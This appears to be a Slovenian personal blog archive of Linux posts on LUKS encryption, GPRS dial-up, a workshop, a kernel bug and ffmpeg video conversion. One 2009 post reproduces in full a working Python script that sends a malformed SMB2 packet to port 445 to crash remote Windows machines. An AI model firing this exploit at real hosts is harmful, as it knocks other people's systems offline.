Archive

Posts Tagged ‘linux’

Enkripcija celotne particije

November 27th, 2010 No comments

Ker so usb ključki vse manjši, in jih je vse lažje izgubiti, je včasih dobro da so podatki na njih kriptirani. Podobno velja za prenosnike, ki jih je sicer težje izgubiti, a so zato toliko bolj privlačni za krajo.

Najbolj primerna metoda enkripcije, je kar uporabiti LUKS, ki zna zakriptirati celo particijo 1, a žal ne podpira skritih particij2. Zanj potrebujemo cryptsetup, ki je ponavadi že del priljubljene linu distribucije3.

Jaz bom v tem primeru formatiral prvo particijo "drugega diska" (/dev/sdb1, torej usb ključ), z ukazom

cryptsetup -s 256 luksFormat /dev/sdb1

Zastavica  '-s 256' nastavi velikost ključa na 256 bitov (torej aes256 namesto privzetega aes128).   Program nas vpraša za potrditev (vpišemo YES), in dvakrat za geslo. Seveda naš novonarejeni container nima ustvarjenege filesystema4. Pred ustvarjanjem le tega, moramo seveda container odkleniti - z ukazom:

cryptsetup luksOpen /dev/sdb1 mojusb

ki po vpisanem geslu postavi odklenjeno vsebino v /dev/mapper/mojusb5. Sedaj lahko ustvarimo filesystem, in ga mountamo:

mkfs.ext4 /dev/mapper/mojusb
mount /dev/mapper/mojusb /mnt/hd/

Sedaj na ključek prenesemo podatke.

Seveda po končanem delu treba ključek odklopiti, in nazaj "zakleniti", kar storimo z:

umount /mnt/hd/
cryptsetup luksClose mojusb

Sedaj lahko ključek odstranimo, in tudi če ga zgubimo, bodo podatki na njem varni6

Torej procedura: luksOpen, mount, delo s podatki, umount, luksClose

Disclaimer: če si ponesreči sformatiraš home particijo, in uničiš edino verzijo doktorata, ki si ga pisal zadnjih pet let, ali pa uničiš pomembne poslovne dokumente, jaz za to ne odgovarjam... in ne, ne vem kako povrniti 1500 izbrisanih txt fajlov, tako da bi se ohranila imena datotek... hvala.

  1. kar je dobro ker se skrijejo podatki o številu in velikosti datotek na njej
  2. truecrypt
  3. na gentoo-ju emergeamo sys-fs/cryptsetup
  4. datotečnega sistema?
  5. namesto "mojusb" lahko uporabimo katerokoli besedo, le v /dev/mapper ne sme obstajati naprava z istim imenom
  6. toliko kolikor je varno geslo... oziroma: xkcd
Categories: geek stuff Tags: , , , , , ,

Windows 7, security, Linux, patchi, in en 0-day

September 8th, 2009 No comments

Pred par dnevi je na slashdotu pojavil topic1  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 "ql", in kok je Linux "beden".  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Linux11 security

Torej... ko pride do kakega grdega b00ga, exploita ipd, so userji "on their own", če uporabljajo Microsoft priozvode, so pa "safe and secure"...

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z 'zagarantirano varnostjo'? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo :)

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

  1. zaradi photobucketa se slik več ne vidi, zato sem postavil mirror tule
Categories: geek stuff, rant Tags: , , , ,

Internet prek GPRS-a na Linuxu - drugič

April 26th, 2009 2 comments

Pred časom sem pisal kako skonfigurirati SE K610 za uporabo kot GPRS modem na linuxu.

Medtem sem kupil novega SE P1i, in ker je telefon novejši, boljši, ima everything but a kitchen sink, seveda NE podpira delovanja v bluetooth NAP (network access point)1 . Zato je bilo potrebno urediti dostop do interneta prek Dial-up networkinga.

Za povezavo prek bluetootha je potrebno prvo poiskati bdaddr in kanal2 (`sdptool search DUN`). Potem s pomočjo orodja 'rfcomm' ustvarimo povezavo na telefon:

rfcomm bind rfcomm0 <bdaddr> <kanal>

Sedaj le še skonfiguriramo povezavo prek nega od dial-up programov, a to zna biti bolj tricky kot izgleda. Default konfiguracije v wvdial-u seveda ne delajo.  Po mnogo poskusih in copy-pasteih z raznih blogov in strani, sem našel konfiguracijo, ki je delovala3.

Delujoč wvdial.conf:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","Internet"
Modem = /dev/rfcomm0
Phone = *99#
Username = mobitel
Password = internet
New PPPD = yes
ISDN = no
BAUD = 115200
Stupid Mode = yes
Carrier Check = no

Potem poženemo `wvdial`, in vzpostavi se povezava na internet.  Poskušamo 'ping'-ati google, a ni mogoče resolvati naslova. Očitno (vsaj pri meni) wvdial/pppd ne nastavi DNS naslovov, a na srečo jih 'wvdial' po povezavi izpiše. Zato je potrebno le še prepisati DNS naslov (ip) v datoteko "/etc/resolv.conf" v obliki "namserver <ip naslov>"4

Upam da bo še komu to koristilo (še posebej raznim Itak!-ovcem in podobnim, ki imate/mo že zakupljene količine podatkov v naročniških paketih).

  1. vsaj meni ni uspelo postaviti telefon v tak način delovanja
  2. v mojem primeru je bil to kanal 7
  3. seveda to pomeni ItWorksForMe(TM), in za naročniški paket pri Mobitelu, za ostale ponudnike bodo potrebne spremembe
  4. vsak v svoji vrstici seveda, če hočeš vpisati oba DNS-a. Če so notri še kaki DNS-i od prej, le-te ali zakomentiraš, ali pa ta, nova, postaviš pred(višje od) stare(ih)
Categories: geek stuff Tags: , , , ,

Linux delavnica - prvič

March 4th, 2009 No comments

V ponedeljek sem bil na začetniški Linux delavnici, ki je, vsaj kolikor vem, organizirana za tretje letnike študentov telekomunikacij na FE-ju.

Najprej je trea razložiti, zakaj sem se je sploh udeležil1. Pa naj bo po alinejah:

  • ne more škoditi
  • uči se uporaba ubuntuja z gnome-om seveda, torej klik-klik operacije, ki jih nikoli nisem ne uporabljal, ne znal
  • ljudje se kregajo z mano da fluxbox z 20imi terminali ni desktop okolje
  • dobim potrdilo o udeležbi, ki tudi ne more škoditi
  • kadarkoli lahko ne-pridem če se mi ne da več
  • v povezavi z zgornjo točko: zastonj je :)

Po cca 45minutni teoriji in zgodovini linuxa, ki nam jo je odpredaval May, je sledilo spoznavanje z Ubuntujem. In kaj sem se naučil?

  • zapakirane teme (.tar.gz, .tar.bz2) lahko drag-and-dropaš na theme selector, in avtomatsko se naloži izbrana tema
  • v OpenOffice draw-u se da risati flowcharte
  • če instaliras sistem tajnici, ki je navajena na windowse, obvezno preimenuj OO Writer v M$ Word
  • v OO Drawu se da tudi iz 2d slik zgenerirati 3d ali rotacijske 3d slike2
  • če imaš pc priklopljen na projektor izključi vse IM programe (oz.  IM program v ednini, če uporabljaš pidgin)
  • v OO-ju obstaja nekaj (česar ime sem pozabil) precej podobno WordArtu iz office-a 97(?)
  • če boš imel pc priklopljen na projektor, in odpiral mail programe, izbriši vse maile z viagra spamom, in tiste ki vsebujejo 'xxx' v subjectu
  • Evolution zna (baje) syncati z symbianom (ni mi še uspelo, opensync, libsyncml, ipd imajo neke probleme, a sinhronizacija dela z kmobiletools)
  • OpenOffice ima vgrajen OO Base, nekaj kot M$ Access, in se zna baje povezovati z MySQL-om (nisem še sprobal)
  • ozadje se da zamenjati tudi brez terminala in 'fbsetbg' (na fluxboxu se ne da...vsaj zdi se mi)
  • Cavazza tudi po gimp-anju izgleda še vedno čudno
  • če imaš sliko Cavazze v home-u zaradi enih predavanj, jo še pred drugimi izbriši
  • LaTeX je v pisanju formul še vedno hitrejši od česarkoli kar premore OO.org :) )

No ja... dovolj da bom prišel tudi naslednjič... vprašanje le koliko bo še klikanja, koliko pa dolgočasnega grepanja, cutanja, headanja in tailanja, ki mi vsak dan posebej polepšuje dan.

  1. Linux uporabljam že kar precej let, administriram en server doma, enega v pipi, in na raznoraznih mašinah popravljam random fu*k-upe
  2. ubistvu iz že danih 'clipartov', sam pač kr ql zgleda
Categories: faks, geek stuff Tags: , ,

kernel-2.6.27-rc{1-6} uničuje mrežne kartice

October 3rd, 2008 3 comments

link:
http://bugzilla.kernel.org/show_bug.cgi?id=11382

Release candidate novega (2.6.27) kernela na linuxu (očitno) zaradi napake v driverju prepiše (in s tem domnevno trajno uniči) eeprom v mrežnih karticah Intel (novi e1000e driver).

Torej tisti, ki imate v laptopih Intelovo mrežno kartico (med lastnike le-te sodim tudi sam), ne preveč eksperimentirat z novimi verzijami kernela. Sodeč po changelogu je zadeva popravljena v -rc7. Torej, ne uporabljat ničesar umes, če imate tako kartico.

2.6.26 (stable torej) z e1000 driverjem dela (vsaj meni) čisto v redu. :D

Categories: geek stuff, rant Tags: , , , , ,

3gp in ffmpeg

September 29th, 2008 No comments

Za windowse obstaja milijon zblj-to-3gp converterjev, eni so plačljivi, eni zastonj, eni zraven instalirajo še kak virus, reklame (gator :/ ipd sranja),... Kaj pa za linux? Se da pretvoriti kak filmček v 3gp format za ogled na mobilnem telefonu? Seveda se da!

Kaj potrebujemo?

  • ffmpeg z amr_nb podporo (pod gentoojem to dobimo če vključimo amrnb USE-flag in emergamo ffmpeg)
  • Malo smisla za navigacijo in delo v konzoli (torej da znamo priti v konzoli v nek direktorij, in tam copy-pastati neko kodo, in malo popraviti po potrebi)

Torej, v nekem direktoriju imamo nek film, ki se imenuje 'film.avi'. Vse kar je potrebno narediti je, da se v konzoli premaknemo v ta direktorij kjer je film, in v konzolo skopiramo naslednjo kodo:

ffmpeg -i film.avi -s qcif -r 12 -ac 1 -ar 8000 -b 30k -ab 12.2k film.3gp

Ta ukaz požene ffmpeg, ki prebere "film.avi" (ime izvornega filma seveda lahko spremenimo po želji), spremeni velikost slike v qcif (176x144px) pri 12ih fpsjih (sličicah na sekundo), avdio spremeni v mono (1 kanal) pri 8khz, za sliko uporabi 30 bps (lahko spremenimo tudi na malo več, vendar razlika ni velika) in avdio na 12.2kbps (kar je največ za amr_nb)... in vse skupaj shrani v datoteko 'film.3gp' (ime tudi lahko spremenimo po želji.

Pretvarjanje traja nekaj časa (pri meni okoli 0.3*čas_trajanja_filma...kar niti ni toliko). Če med pretvarjanjem pritisnemo tipko 'q' se pretvarjanje ustavi, in film zaključi, torej lahko pretvorimo samo nekaj sekund filma, in preverimo kako bo izgledal pretvorjen filmček.

Potem ga je le še treba prenesti na gsm... prek kabla, kartice.. ali pa kar prek bluetootha.

Za prenos prek bluetootha je (meni osebno) ql program ussp-push. Ko ga instaliramo, v konzoli poženemo ukaz "ussp-push imemobitela@ film.3gp film.3gp" (torej ussp-push, ime vašega mobitela, ali pa kar bdaddr, torej naslov naprave, ki ga lahko pogledamo z 'hcitool scan' - pozor(!) za imenom je nujno afna (@). Potem pa ime datoteke na disku, in ime ki se bo shranilo na gsm - lahko sta seveda enaka.). Sledi pisk, vprašanje če hočeš sprejeti... 'da'... in že se pošilja.

Kakšna je kvaliteta slike? Precej tko-tko... ampak za gsm čisto dobra. Velikost? 42 minutna serija se mi je stisnila na ~10mb. Ja.. je zanič slika... ampak se vidi bistvo.

Za malo lepšo sliko (malo pod 1mb/min) lahko uporabimo tudi:

ffmpeg -i film.avi -s qcif -r 12 -ac 1 -ar 8000  -ab 12.2k -b 100k  film.3gp

Če imaste pa večji ekran pa lahko tudi:

ffmpeg -i film.avi -s cif -r 12 -ac 1 -ar 8000  -ab 12.2k -b 150k  film.3gp

Amm.. kbps za video se spreminja s časom.. tako da tud če naštimate 100kbps, bo začel pri malo večji vrednosti (ali pa manjši) in se določeni vrednosti počasi približeval

ps: če že mislte gledat filmčke ipd. na mobitelu nekje zunaj, si nabavte slušalke! Dost mam že klincov ki naglas poslušajo hreščečo musko na mobitelih, ponavad kje bolj zadaj na busu, al pa kr na ulci.

Categories: geek stuff Tags: , , , ,